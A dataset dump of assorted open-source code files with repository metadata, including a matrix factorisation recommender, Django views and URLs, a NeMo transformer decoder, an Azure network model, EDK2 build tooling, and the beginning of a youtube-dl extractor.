def __init__(self, k = 100, rounds = 10, alpha = 0.001, beta = 0.01, train_fn = '', pred_fn = '', output = ''):
self.k = k
self.rounds = rounds
self.alpha = alpha
self.beta = beta
self.train_fn = train_fn
self.pred_fn = pred_fn
self.output = output
self.usr_dct = {}
self.item_dct = {}
self.rating_graph = {}
self.rating_sz = 0
self.miu = 0.
self.rmse = 0.
self.p = None
self.q = None
self.usr_bias = None
self.item_bias = None
def load(self):
f = open(self.train_fn)
for line in f:
uid, iid, rating = line.strip('\n').split(',')
rating = float(rating)
if uid not in self.usr_dct:
self.usr_dct[uid] = len(self.usr_dct)
if iid not in self.item_dct:
self.item_dct[iid] = len(self.item_dct)
self.rating_graph.setdefault(self.usr_dct[uid], []).append((self.item_dct[iid], rating))
self.rating_sz += 1
self.miu += rating
self.miu /= self.rating_sz
f.close()
def estimate(self, i, j):
return self.miu + self.usr_bias[i] + self.item_bias[j] + np.dot(self.p[i, :], self.q[j, :])
def cal_rmse(self):
import math
self.rmse = 0.
for u_indx, pair in self.rating_graph.iteritems():
for i_indx, rating in pair:
self.rmse += (rating - self.estimate(u_indx, i_indx)) ** 2
return math.sqrt(self.rmse / self.rating_sz)
def learning(self):
#import time
self.p = np.random.rand(len(self.usr_dct), self.k)
self.q = np.random.rand(len(self.item_dct), self.k)
self.usr_bias = np.random.rand(len(self.usr_dct))
self.item_bias = np.random.rand(len(self.item_dct))
# learning
for rd in xrange(self.rounds):
#start = time.time()
for u_indx, pair in self.rating_graph.iteritems():
for i_indx, rating in pair:
e = rating - self.estimate(u_indx, i_indx)
# compute delta
delta_p = self.alpha * (2 * e * self.q[i_indx, :] - self.beta * self.p[u_indx, :])
delta_q = self.alpha * (2 * e * self.p[u_indx, :] - self.beta * self.q[i_indx, :])
delta_ubias = self.alpha * (2 * e - self.beta * self.usr_bias[u_indx])
delta_ibias = self.alpha * (2 * e - self.beta * self.item_bias[i_indx])
# update with delta
self.p[u_indx, :] += delta_p
self.q[i_indx, :] += delta_q
self.usr_bias[u_indx] += delta_ubias
self.item_bias[i_indx] += delta_ibias
def solve(self):
self.load()
self.learning()
def predict_rating(self):
f1 = open(self.pred_fn)
f2 = open(self.output, 'w')
for line in f1:
uid, iid = line.strip('\n').split(',')
u_indx = self.usr_dct[uid]
i_indx = self.item_dct[iid]
pred_rating = self.estimate(u_indx, i_indx)
f2.write('%s,%s,%s\n' % (uid, iid, pred_rating))
f1.close()
f2.close()
if __name__ == '__main__':
mf_solver = mf(k = 80, rounds = 3, alpha = 0.005, beta = 0.02, train_fn = '/mfs/user/wuhong/paracel/test/serial/training.csv', pred_fn = '/mfs/alg/Rec_Competition/predict.csv', output = '/mfs/user/wuhong/paracel/test/serial/mf_result')
mf_solver.solve()
print mf_solver.cal_rmse()
mf_solver.predict_rating()
|
[
"xunzhangthu@gmail.com"
] |
xunzhangthu@gmail.com
|
cb02f43cde2d805ac8b14cabc69256dfad851d6a
|
fec36e7493a78575cd0320bf31c5080649863a06
|
/src/views/feature_value/list.py
|
2294b96b083b882991877221f5e144dc233b810e
|
[] |
no_license
|
teimurjan/eye8-backend
|
6f44e830dd17dcac8b23acc3b66b9918357f643b
|
bf0a4c894a5b3770fada269d8b4d7d72367ab1ba
|
refs/heads/master
| 2023-06-30T01:34:38.358903
| 2021-06-23T10:06:29
| 2021-06-23T10:06:29
| 273,144,546
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,287
|
py
|
from src.validation_rules.feature_value.create import (
CreateFeatureValueData,
CreateFeatureValueDataValidator,
)
from typing import Type
from src.serializers.feature_value import FeatureValueSerializer
from src.constants.status_codes import OK_CODE
from src.errors import InvalidEntityFormat
from src.services.feature_value import FeatureValueService
from src.views.base import PaginatableView, ValidatableView
class FeatureValueListView(ValidatableView[CreateFeatureValueData], PaginatableView):
def __init__(
self,
validator: CreateFeatureValueDataValidator,
service: FeatureValueService,
serializer_cls: Type[FeatureValueSerializer],
):
super().__init__(validator)
self._service = service
self._serializer_cls = serializer_cls
def get(self, request):
pagination_data = self._get_pagination_data(request)
meta = None
feature_values = []
if pagination_data:
feature_values, count = self._service.get_all(
offset=pagination_data["offset"], limit=pagination_data["limit"]
)
meta = self._get_meta(
count, pagination_data["page"], pagination_data["limit"]
)
else:
feature_values, _ = self._service.get_all()
raw_intl = request.args.get("raw_intl") == "1"
serialized_feature_values = [
self._serializer_cls(feature_value)
.in_language(None if raw_intl else request.language)
.with_serialized_feature_type()
.serialize()
for feature_value in feature_values
]
return {"data": serialized_feature_values, "meta": meta}, OK_CODE
def post(self, request):
try:
valid_data = self._validate(request.get_json())
feature_value = self._service.create(valid_data, user=request.user)
serialized_feature_value = (
self._serializer_cls(feature_value)
.with_serialized_feature_type()
.serialize()
)
return {"data": serialized_feature_value}, OK_CODE
except self._service.FeatureTypeInvalid:
raise InvalidEntityFormat({"feature_type_id": "errors.invalidID"})
|
[
"teymurgg321@gmail.com"
] |
teymurgg321@gmail.com
|
3901eb30debbc1c94cf3d40f80aa71a9a4ffbaa1
|
0b514feea82eaa2e341130d9e23d13d72271d644
|
/2.Jump_to_python/Python07.py
|
99deebb9aeec73d60845d030c9ca5481a5b33cec
|
[] |
no_license
|
Jerrykim91/FromZero
|
f8478012130948a11978a46ab6ec7922cb354a8f
|
fdd5a0716b29c77019cfcd1e1eab7ed4afd1aed4
|
refs/heads/master
| 2022-12-25T15:04:22.656462
| 2020-10-10T14:35:06
| 2020-10-10T14:35:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,514
|
py
|
# 모듈화 + 패키지
# + 모듈가져오기, 테스트 코드 배치 , 모듈가져오기 , 패키지 사용
# 모듈
# 함수나 변수 또는 클래스를 모아 놓은 파일이다.
# => 확장자가.py파일
# mod.py,__init__.py,p1.py, p2.py,...
# import 모듈이름
# 모듈이름.함수 모듈이름을 안쓰려면 -> from 모듈이름 import 모듈함수
# from mod1 import* -> * (모든것)을 의미
# 모듈화의 대상 => 변수, 함수, 클래스 <= 요소를 가져다 내것 처럼 사용가능
# 패키지
# 유사한 기능 끼리 묶어둔 디렉토리 ,유틸리티 , 통신 , gui등등 모아둔것
# 패키지 폴더 내에 __init__.py 이 파일은 하위 호환을 위해서 python3.3이하에서는 모두 사용한다.
# 그리고, __init__.py는 곧 해당 패키지 자체를 의미한다
#-------------------------------
# from 패키지.패키지....모듈\ import 변수,함수,클레스(필요한것들 열거)
from a.b.mod import PI, add
print(PI)
print(add(1,2))
# from 패키지.패키지 \ import 변수, 함수, 클래스
# 경로상 마지막 패키지(디렉토리)안에 있는 __init__.py에서 모듈을 가져온다
from a.b import PI2 as pi2 # PI2 -> pi2 이름 변경
print(pi2)
# 패키지명은 절대로 .들어가면 않된다!!
# 모듈명도 절대로 .들어가면 않된다!!
from a import PI3
print(PI3)
# 별칭 => 이름이 너무 길어서라든지, 이름 변경을 해서 사용하고 싶다면
# 원래이름 as 별칭
from a import PI3 as pi
print(pi)
# 가져올 모듈이 너무 많다. 다 가져왔으면 좋겟다 => *
# 하위 호환을 위해서는
# __all__=['mod']
from a.b import *
print( mod.PI, PI2 )
# import만 사용시
import a.b.mod as m
print( m.PI )
import a.b as bm
print( bm.PI2 )
# 모듈을 가져온다는 것은 해당 모듈을 실행한다라고 봐도 무방하다->메모리 적제를 해야하니
# 내가 만든 모듈같은 경우 의도하지 않은 코드가 실행될수 있다
# => 테스트 할려고 만든 코드는 모듈 가져오기 수행시 실제로 구동되면 않된다
# => 이런 코드 처리가 필요하다 => __name__을 이용하여 처리 한다
# __name__을 사용하는 모듈을 직접 구동하면 "__main__"으로 나오고,
# 모듈로 사용되면(즉, 다른 모듀이 가져다 쓰면) "모듈명"으로 나온다
from Python08 import XMan
mu = XMan( '로건2', 100, 50, 51)
print( mu )
print('Python07 : __name__', __name__)
|
[
"sun4131@gmail.com"
] |
sun4131@gmail.com
|
94d03e9f0f7b8cec3c47cc368593566e2ada6fad
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_magnesia.py
|
9193757fb3463cb627d30a16deadeb1b54c32ebb
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 327
|
py
|
#calss header
class _MAGNESIA():
def __init__(self,):
self.name = "MAGNESIA"
self.definitions = [u'a white substance used in stomach medicines']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
34b0a3903fbab558986e74b115ebb5bf14cae7a3
|
7c857119fe1505b1d80d6e62969661c06dc1a2f4
|
/BaseTools/Source/Python/GenFds/VerSection.py
|
7280e80cb4ef7ce47524af2de67a3c2e84cf5a33
|
[
"BSD-2-Clause"
] |
permissive
|
CloverHackyColor/CloverBootloader
|
7042ca7dd6b513d22be591a295e49071ae1482ee
|
2711170df4f60b2ae5aa20add3e00f35cf57b7e5
|
refs/heads/master
| 2023-08-30T22:14:34.590134
| 2023-08-27T19:14:02
| 2023-08-27T19:14:02
| 205,810,121
| 4,734
| 770
|
BSD-2-Clause
| 2023-09-03T12:41:33
| 2019-09-02T08:22:14
|
C
|
UTF-8
|
Python
| false
| false
| 2,917
|
py
|
## @file
# process Version section generation
#
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
from __future__ import absolute_import
from .Ffs import SectionSuffix
import Common.LongFilePathOs as os
from .GenFdsGlobalVariable import GenFdsGlobalVariable
from CommonDataClass.FdfClass import VerSectionClassObject
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.DataType import SUP_MODULE_SEC
## generate version section
#
#
class VerSection (VerSectionClassObject):
## The constructor
#
# @param self The object pointer
#
def __init__(self):
VerSectionClassObject.__init__(self)
## GenSection() method
#
# Generate version section
#
# @param self The object pointer
# @param OutputPath Where to place output file
# @param ModuleName Which module this section belongs to
# @param SecNum Index of section
# @param KeyStringList Filter for inputs of section generation
# @param FfsInf FfsInfStatement object that contains this section data
# @param Dict dictionary contains macro and its value
# @retval tuple (Generated file name, section alignment)
#
def GenSection(self, OutputPath, ModuleName, SecNum, KeyStringList, FfsInf=None, Dict=None, IsMakefile = False):
#
# Prepare the parameter of GenSection
#
if FfsInf:
self.Alignment = FfsInf.__ExtendMacro__(self.Alignment)
self.BuildNum = FfsInf.__ExtendMacro__(self.BuildNum)
self.StringData = FfsInf.__ExtendMacro__(self.StringData)
self.FileName = FfsInf.__ExtendMacro__(self.FileName)
OutputFile = os.path.join(OutputPath,
ModuleName + SUP_MODULE_SEC + SecNum + SectionSuffix.get('VERSION'))
OutputFile = os.path.normpath(OutputFile)
# Get String Data
StringData = ''
if self.StringData:
StringData = self.StringData
elif self.FileName:
if Dict is None:
Dict = {}
FileNameStr = GenFdsGlobalVariable.ReplaceWorkspaceMacro(self.FileName)
FileNameStr = GenFdsGlobalVariable.MacroExtend(FileNameStr, Dict)
FileObj = open(FileNameStr, 'r')
StringData = FileObj.read()
StringData = '"' + StringData + '"'
FileObj.close()
GenFdsGlobalVariable.GenerateSection(OutputFile, [], 'EFI_SECTION_VERSION',
Ver=StringData, BuildNumber=self.BuildNum, IsMakefile=IsMakefile)
OutputFileList = []
OutputFileList.append(OutputFile)
return OutputFileList, self.Alignment
|
[
"isakov-sl@bk.ru"
] |
isakov-sl@bk.ru
|
b197dbe5eb039338439bb8c6b3e6fb20f0f80e18
|
db1247a3999e3f22db025639d09a605082ded89d
|
/grid/urls.py
|
4da7303e5324e7da6e0f39e3e8d1faa61df9ca6a
|
[
"MIT"
] |
permissive
|
wise-team/hiveprojects.io
|
1614deb0e4df5fe19cf62dbdb4d8d2741173c6b0
|
96e15a53f02c7327fe982a06b2dce56cd130e38c
|
refs/heads/master
| 2022-12-12T18:44:35.221892
| 2020-03-27T21:50:03
| 2020-03-27T21:50:03
| 248,597,914
| 5
| 1
|
MIT
| 2022-11-22T01:59:55
| 2020-03-19T20:24:59
|
Python
|
UTF-8
|
Python
| false
| false
| 2,093
|
py
|
"""grid url patterns"""
from django.conf.urls import url
from grid import views
from grid.views import (
add_feature,
add_grid,
add_grid_package,
add_new_grid_package,
ajax_grid_list,
delete_feature,
delete_grid_package,
edit_element,
edit_grid,
edit_feature,
grid_detail,
grids
)
urlpatterns = [
url(
regex='^add/$',
view=add_grid,
name='add_grid',
),
url(
regex='^(?P<slug>[-\w]+)/edit/$',
view=edit_grid,
name='edit_grid',
),
url(
regex='^element/(?P<feature_id>\d+)/(?P<package_id>\d+)/$',
view=edit_element,
name='edit_element',
),
url(
regex='^feature/add/(?P<grid_slug>[a-z0-9\-\_]+)/$',
view=add_feature,
name='add_feature',
),
url(
regex='^feature/(?P<id>\d+)/$',
view=edit_feature,
name='edit_feature',
),
url(
regex='^feature/(?P<id>\d+)/delete/$',
view=delete_feature,
name='delete_feature',
),
url(
regex='^package/(?P<id>\d+)/delete/$',
view=delete_grid_package,
name='delete_grid_package',
),
url(
regex='^(?P<grid_slug>[a-z0-9\-\_]+)/package/add/$',
view=add_grid_package,
name='add_grid_package',
),
url(
regex='^(?P<grid_slug>[a-z0-9\-\_]+)/package/add/new$',
view=add_new_grid_package,
name='add_new_grid_package',
),
url(
regex='^ajax_grid_list/$',
view=ajax_grid_list,
name='ajax_grid_list',
),
url(
regex='^$',
view=grids,
name='grids',
),
url(
regex='^g/(?P<slug>[-\w]+)/$',
view=grid_detail,
name='grid',
),
url(
regex='^g/(?P<slug>[-\w]+)/landscape/$',
view=views.grid_detail_landscape,
name='grid_landscape',
),
url(regex='^g/(?P<slug>[-\w]+)/timesheet/$',
view=views.grid_timesheet,
name='grid_timesheet'
)
]
|
[
"noisy.pl@gmail.com"
] |
noisy.pl@gmail.com
|
c5ad1b5d232b6458e70b9d7459d2978fcf989724
|
1bde114a847c629701e3acd004be5788594e0ef1
|
/Examples/PatternRefactoring/trashvisitor/Visitor.py
|
29bc5089c2ffa37d3322ce93d7a97ca546f4a1f4
|
[] |
no_license
|
BruceEckel/ThinkingInPython
|
0b234cad088ee144bb8511e1e7db9fd5bba78877
|
76a1310deaa51e02e9f83ab74520b8269aac6fff
|
refs/heads/master
| 2022-02-21T23:01:40.544505
| 2022-02-08T22:26:52
| 2022-02-08T22:26:52
| 97,673,620
| 106
| 33
| null | 2022-02-08T22:26:53
| 2017-07-19T04:43:50
|
Python
|
UTF-8
|
Python
| false
| false
| 215
|
py
|
# PatternRefactoring/trashvisitor/Visitor.py
# The base class for visitors.
class Visitor:
def visit(self, Aluminum a)
def visit(self, Paper p)
def visit(self, Glass g)
def visit(self, Cardboard c)
|
[
"mindviewinc@gmail.com"
] |
mindviewinc@gmail.com
|
d8efecb43d9198e3dd2221f4e39fb241646378fc
|
0032d988541e85c47b5034c20ecf88220dde5a95
|
/openbook_posts/migrations/0026_auto_20190414_1620.py
|
242d6b7b2f6ad2429773288abeaee56f0fb9ccf8
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
OkunaOrg/okuna-api
|
eabd37fef9d2be59b590ed8d72bee084ac377997
|
f87d8e80d2f182c01dbce68155ded0078ee707e4
|
refs/heads/master
| 2022-02-04T21:31:10.577601
| 2021-12-28T18:20:39
| 2021-12-28T18:20:39
| 151,052,951
| 185
| 92
|
MIT
| 2022-01-13T01:00:40
| 2018-10-01T07:44:46
|
Python
|
UTF-8
|
Python
| false
| false
| 444
|
py
|
# Generated by Django 2.2 on 2019-04-14 14:20
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('openbook_posts', '0025_post_is_edited'),
]
operations = [
migrations.AlterField(
model_name='post',
name='uuid',
field=models.UUIDField(db_index=True, default=uuid.uuid4, editable=False, unique=True),
),
]
|
[
"joel@open-book.org"
] |
joel@open-book.org
|
a9194341e115335348649466389655b10bc7ccd4
|
caa05194b8f11f29a19767c94fdc93628be694d5
|
/nemo/collections/nlp/modules/common/transformer/transformer_decoders.py
|
910a7104ea24d2870a596d91e46359933d887e99
|
[
"Apache-2.0"
] |
permissive
|
Jimmy-INL/NeMo
|
a589ab0ab97b9ccb8921579670e80c470ce7077b
|
6a3753b3013dc92a3587853d60c5086e2e64d98f
|
refs/heads/main
| 2023-04-02T22:28:29.891050
| 2021-04-13T18:22:24
| 2021-04-13T18:22:24
| 357,681,603
| 1
| 0
|
Apache-2.0
| 2021-04-13T20:34:12
| 2021-04-13T20:34:12
| null |
UTF-8
|
Python
| false
| false
| 8,169
|
py
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from dataclasses import dataclass
import torch
import torch.nn as nn
from omegaconf.omegaconf import MISSING
from nemo.collections.common.parts import form_attention_mask
from nemo.collections.nlp.modules.common.transformer.transformer_modules import MultiHeadAttention, PositionWiseFF
__all__ = ["TransformerDecoder"]
class TransformerDecoderBlock(nn.Module):
"""
Building block of Transformer decoder.
Args:
hidden_size: size of the embeddings in the model, also known as d_model
inner_size: number of neurons in the intermediate part of feed-forward
net, usually is (4-8 x hidden_size) in the papers
num_attention_heads: number of heads in multi-head attention
attn_score_dropout: probability of dropout applied to attention scores
attn_layer_dropout: probability of dropout applied to the output of the
attention layers, but before layer normalization
ffn_dropout: probability of dropout applied to FFN output
hidden_act: activation function used between two linear layers in FFN
"""
def __init__(
self,
hidden_size: int,
inner_size: int,
num_attention_heads: int = 1,
attn_score_dropout: float = 0.0,
attn_layer_dropout: float = 0.0,
ffn_dropout: float = 0.0,
hidden_act: str = "relu",
pre_ln: bool = False,
):
super().__init__()
self.pre_ln = pre_ln
self.layer_norm_1 = nn.LayerNorm(hidden_size, eps=1e-5)
self.first_sub_layer = MultiHeadAttention(
hidden_size, num_attention_heads, attn_score_dropout, attn_layer_dropout
)
self.layer_norm_2 = nn.LayerNorm(hidden_size, eps=1e-5)
self.second_sub_layer = MultiHeadAttention(
hidden_size, num_attention_heads, attn_score_dropout, attn_layer_dropout
)
self.layer_norm_3 = nn.LayerNorm(hidden_size, eps=1e-5)
self.third_sub_layer = PositionWiseFF(hidden_size, inner_size, ffn_dropout, hidden_act)
def forward_preln(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
"""
Pre-LayerNorm block
Order of operations: LN -> Self-Attn -> Residual -> LN -> Cross-Attn -> Residual -> LN -> FFN
"""
residual = decoder_query
decoder_query = self.layer_norm_1(decoder_query)
decoder_keys = self.layer_norm_1(decoder_keys)
self_attn_output = self.first_sub_layer(decoder_query, decoder_keys, decoder_keys, decoder_mask)
self_attn_output += residual
residual = self_attn_output
self_attn_output = self.layer_norm_2(self_attn_output)
enc_dec_attn_output = self.second_sub_layer(self_attn_output, encoder_states, encoder_states, encoder_mask)
enc_dec_attn_output += residual
residual = enc_dec_attn_output
enc_dec_attn_output = self.layer_norm_3(enc_dec_attn_output)
output_states = self.third_sub_layer(enc_dec_attn_output)
output_states += residual
return output_states
def forward_postln(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
"""
Post-LayerNorm block
Order of operations: Self-Attn -> Residual -> LN -> Cross-Attn -> Residual -> LN -> FFN -> Residual -> LN
"""
self_attn_output = self.first_sub_layer(decoder_query, decoder_keys, decoder_keys, decoder_mask)
self_attn_output += decoder_query
self_attn_output = self.layer_norm_1(self_attn_output)
enc_dec_attn_output = self.second_sub_layer(self_attn_output, encoder_states, encoder_states, encoder_mask)
enc_dec_attn_output += self_attn_output
enc_dec_attn_output = self.layer_norm_2(enc_dec_attn_output)
output_states = self.third_sub_layer(enc_dec_attn_output)
output_states += enc_dec_attn_output
return self.layer_norm_3(output_states)
def forward(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
if self.pre_ln:
return self.forward_preln(decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask)
else:
return self.forward_postln(decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask)
class TransformerDecoder(nn.Module):
def __init__(
self,
num_layers: int,
hidden_size: int,
inner_size: int,
num_attention_heads: int = 1,
attn_score_dropout: float = 0.0,
attn_layer_dropout: float = 0.0,
ffn_dropout: float = 0.0,
hidden_act: str = "relu",
pre_ln: bool = False,
):
super().__init__()
layer = TransformerDecoderBlock(
hidden_size,
inner_size,
num_attention_heads,
attn_score_dropout,
attn_layer_dropout,
ffn_dropout,
hidden_act,
pre_ln,
)
self.layers = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_layers)])
self.diagonal = 0
def _get_memory_states(self, decoder_states, decoder_mems_list=None, i=0):
if decoder_mems_list is not None:
memory_states = torch.cat((decoder_mems_list[i], decoder_states), dim=1)
else:
memory_states = decoder_states
return memory_states
def forward(
self, decoder_states, decoder_mask, encoder_states, encoder_mask, decoder_mems_list=None, return_mems=False
):
"""
Args:
decoder_states: output of the embedding layer (B x L_dec x H)
decoder_mask: decoder inputs mask (B x L_dec)
encoder_states: output of the encoder (B x L_enc x H)
encoder_mask: encoder inputs mask (B x L_enc)
decoder_mems_list: list of the cached decoder hidden states
for fast autoregressive generation which will be used instead
of decoder_states as keys and values if not None
return_mems: bool, whether to return outputs of all decoder layers
or the last layer only
"""
decoder_attn_mask = form_attention_mask(decoder_mask, diagonal=self.diagonal)
encoder_attn_mask = form_attention_mask(encoder_mask)
memory_states = self._get_memory_states(decoder_states, decoder_mems_list, 0)
cached_mems_list = [memory_states]
for i, layer in enumerate(self.layers):
decoder_states = layer(decoder_states, decoder_attn_mask, memory_states, encoder_states, encoder_attn_mask)
memory_states = self._get_memory_states(decoder_states, decoder_mems_list, i + 1)
cached_mems_list.append(memory_states)
if return_mems:
return cached_mems_list
else:
return cached_mems_list[-1]
def eval(self):
self.diagonal = None
super().eval()
def train(self, mode=True):
if mode is True:
self.diagonal = 0
else:
self.diagonal = None
super().train(mode)
def input_example(self):
"""
Generates input examples for tracing etc.
Returns:
A tuple of input examples.
"""
sample = next(self.parameters())
input_ids = torch.randint(low=0, high=2048, size=(2, 16, 1024), device=sample.device)
encoder_mask = torch.randint(low=0, high=1, size=(2, 16), device=sample.device)
return tuple([input_ids, encoder_mask, input_ids, encoder_mask])
|
[
"noreply@github.com"
] |
Jimmy-INL.noreply@github.com
|
08541c40fee9474b87a66113054f486ea71f0e98
|
ba0e07b34def26c37ee22b9dac1714867f001fa5
|
/azure-mgmt-network/azure/mgmt/network/models/network_interface.py
|
fa19b8e2ad03dfa74bef269fdcb7d724b08d0661
|
[
"MIT"
] |
permissive
|
CharaD7/azure-sdk-for-python
|
b11a08ac7d24a22a808a18203072b4c7bd264dfa
|
9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c
|
refs/heads/master
| 2023-05-12T12:34:26.172873
| 2016-10-26T21:35:20
| 2016-10-26T21:35:20
| 72,448,760
| 1
| 0
|
MIT
| 2023-05-04T17:15:01
| 2016-10-31T15:14:09
|
Python
|
UTF-8
|
Python
| false
| false
| 4,531
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .resource import Resource
class NetworkInterface(Resource):
"""A NetworkInterface in a resource group.
Variables are only populated by the server, and will be ignored when
sending a request.
:param id: Resource Id
:type id: str
:ivar name: Resource name
:vartype name: str
:ivar type: Resource type
:vartype type: str
:param location: Resource location
:type location: str
:param tags: Resource tags
:type tags: dict
:param virtual_machine: Gets or sets the reference of a VirtualMachine
:type virtual_machine: :class:`SubResource
<azure.mgmt.network.models.SubResource>`
:param network_security_group: Gets or sets the reference of the
NetworkSecurityGroup resource
:type network_security_group: :class:`NetworkSecurityGroup
<azure.mgmt.network.models.NetworkSecurityGroup>`
:param ip_configurations: Gets or sets list of IPConfigurations of the
network interface
:type ip_configurations: list of :class:`NetworkInterfaceIPConfiguration
<azure.mgmt.network.models.NetworkInterfaceIPConfiguration>`
:param dns_settings: Gets or sets DNS settings in network interface
:type dns_settings: :class:`NetworkInterfaceDnsSettings
<azure.mgmt.network.models.NetworkInterfaceDnsSettings>`
:param mac_address: Gets the MAC address of the network interface
:type mac_address: str
:param primary: Gets whether this is a primary NIC on a virtual machine
:type primary: bool
:param enable_ip_forwarding: Gets or sets whether IPForwarding is enabled
on the NIC
:type enable_ip_forwarding: bool
:param resource_guid: Gets or sets resource guid property of the network
interface resource
:type resource_guid: str
:param provisioning_state: Gets provisioning state of the PublicIP
resource Updating/Deleting/Failed
:type provisioning_state: str
:param etag: Gets a unique read-only string that changes whenever the
resource is updated
:type etag: str
"""
_validation = {
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'virtual_machine': {'key': 'properties.virtualMachine', 'type': 'SubResource'},
'network_security_group': {'key': 'properties.networkSecurityGroup', 'type': 'NetworkSecurityGroup'},
'ip_configurations': {'key': 'properties.ipConfigurations', 'type': '[NetworkInterfaceIPConfiguration]'},
'dns_settings': {'key': 'properties.dnsSettings', 'type': 'NetworkInterfaceDnsSettings'},
'mac_address': {'key': 'properties.macAddress', 'type': 'str'},
'primary': {'key': 'properties.primary', 'type': 'bool'},
'enable_ip_forwarding': {'key': 'properties.enableIPForwarding', 'type': 'bool'},
'resource_guid': {'key': 'properties.resourceGuid', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, id=None, location=None, tags=None, virtual_machine=None, network_security_group=None, ip_configurations=None, dns_settings=None, mac_address=None, primary=None, enable_ip_forwarding=None, resource_guid=None, provisioning_state=None, etag=None):
super(NetworkInterface, self).__init__(id=id, location=location, tags=tags)
self.virtual_machine = virtual_machine
self.network_security_group = network_security_group
self.ip_configurations = ip_configurations
self.dns_settings = dns_settings
self.mac_address = mac_address
self.primary = primary
self.enable_ip_forwarding = enable_ip_forwarding
self.resource_guid = resource_guid
self.provisioning_state = provisioning_state
self.etag = etag
|
[
"lmazuel@microsoft.com"
] |
lmazuel@microsoft.com
|
cbc244e711bf6a4c305a2d03973ffb5ac09658b0
|
85a6fcace7eaff15242595bdf9b9e8f41116dc7f
|
/Round A/workout.py
|
7d0a0bd6e2ed76a2a224a03c3a89e1a9f3b430f1
|
[
"MIT"
] |
permissive
|
Meenadshi/GoogleKickStart-2020
|
e0dfd4f2e44a39c5c58de034265baf2fc7a81f9b
|
7c60b5a7a6c9daaf3f20b28d6b60aab19f5f22df
|
refs/heads/main
| 2023-08-15T23:41:31.484139
| 2021-10-17T00:34:58
| 2021-10-17T00:34:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 874
|
py
|
# Copyright (c) 2020 kamyu. All rights reserved.
#
# Google Kick Start 2020 Round A - Problem C. Workout
# https://codingcompetitions.withgoogle.com/kickstart/round/000000000019ffc7/00000000001d3f5b
#
# Time: O(Nlog(MAX_DIFF))
# Space: O(1)
#
def check(M, K, target):
count = 0
for i in xrange(1, len(M)):
count += ((M[i]-M[i-1])-1)//target # ceiling(diff/target)-1
if count > K:
return False
return True
def workout():
N, K = map(int, raw_input().strip().split())
M = map(int, raw_input().strip().split())
left, right = 1, max(M[i]-M[i-1] for i in xrange(1, len(M)))
while left <= right:
mid = left + (right-left)//2
if check(M, K, mid):
right = mid-1
else:
left = mid+1
return left
for case in xrange(input()):
print 'Case #%d: %s' % (case+1, workout())
|
[
"kamyu104@gmail.com"
] |
kamyu104@gmail.com
|
ab81b868a0040eb8cd4674fd20d3f934f5141499
|
981ecc9cf59dd6f839c3e40d26601efb1d073558
|
/src/face_recognition/youtube_dl/extractor/tf1.py
|
e595c4a69b3f03361abc05f6bca61adecb61cf36
|
[
"MIT"
] |
permissive
|
lodemo/CATANA
|
469e0684b816f09ac74f186552b463cc77db369e
|
a349f460772511ccbb16429b40bfb50f774d45d4
|
refs/heads/master
| 2023-03-30T04:07:12.070332
| 2021-02-03T21:47:32
| 2021-02-03T21:47:32
| 102,767,095
| 12
| 6
|
MIT
| 2023-03-24T21:55:24
| 2017-09-07T17:36:45
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,239
|
py
|
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
class TF1IE(InfoExtractor):
"""TF1 uses the wat.tv player."""
_VALID_URL = r'https?://(?:(?:videos|www|lci)\.tf1|(?:www\.)?(?:tfou|ushuaiatv|histoire|tvbreizh))\.fr/(?:[^/]+/)*(?P<id>[^/?#.]+)'
_TESTS = [{
'url': 'http://videos.tf1.fr/auto-moto/citroen-grand-c4-picasso-2013-presentation-officielle-8062060.html',
'info_dict': {
'id': '10635995',
'ext': 'mp4',
